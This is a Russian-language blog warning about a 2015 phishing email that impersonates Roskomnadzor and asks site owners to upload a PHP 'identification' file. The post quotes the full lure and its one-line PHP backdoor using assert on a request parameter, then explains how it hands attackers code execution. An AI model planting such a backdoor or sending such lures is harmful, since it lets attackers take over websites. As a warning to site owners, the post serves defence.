В сети появился очередной развод для владельцев сайтов. Злоумышленники воспользовались активной деятельностью Роскомнадзора, который все подряд запрещает, и стали выступать от его имени. В данном случае владельцу сайта предлагается самостоятельно установить на него "идентификационный код", ну а попросту самостоятельно завязать веревку на своей шее :) Далее злоумышленники используя этот код могут творить сайте все что хотят, внедряя все что им в голову придет. Поскольку, как оказалось, рассылка таких "писем счастья" носит массовый характер, то просьба распространять информацию как можно шире, чтобы другие не попались!

Имейте в виду, что как только информация распространится и они поймут что их раскусили, то начнут менять внешний вид письма, адрес отправителя и т.д. В общем опять же кто-то из чайников может влететь.

Итак, вы получаете письмо такого вида:

27.08.2015, 00:22, "Роскомнадзор" <zapret-info@roskomnadzor.org>;:

Здравствуйте.
Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени moy_site.ru в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт moy_site.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени moy_site.ru, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени moy_site.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: moy_site.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени moy_site.ru, следую инструкции указанной выше, то Ваш сайт moy_site.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.[]

Вот такое вот письмецо приходит. При этом чудо сайт roskomnadzor.org создан всего неделю назад (адрес настоящего http://rkn.gov.ru/ ). А функция assert позволяет злоумышленникам выполнить на сайте любой код переданный в переменной roskomnadzor. Неплохо да?

Так что не ведитесь на такие письма и сразу посылайте их нафиг. И не говорите что я вас не предупреждал!

P.S. Глянул в инете, тема уже активно обсуждается на Хабрахабре http://habrahabr.ru/post/265515/ Так что рассылка идет широким фронтом, проинформируйте знакомых.

P.P.S. Экспериментально установлено, что письма идут на адреса указанные в контактных на самом сайте, а не на адреса регистрации домена.